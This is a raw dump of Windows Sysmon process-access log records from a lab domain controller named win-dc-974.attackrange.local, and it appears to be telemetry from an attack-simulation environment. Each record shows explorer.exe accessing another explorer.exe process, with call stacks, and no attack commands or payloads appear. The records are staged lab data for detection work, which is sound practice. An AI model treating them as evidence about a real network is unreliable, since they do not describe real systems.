16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 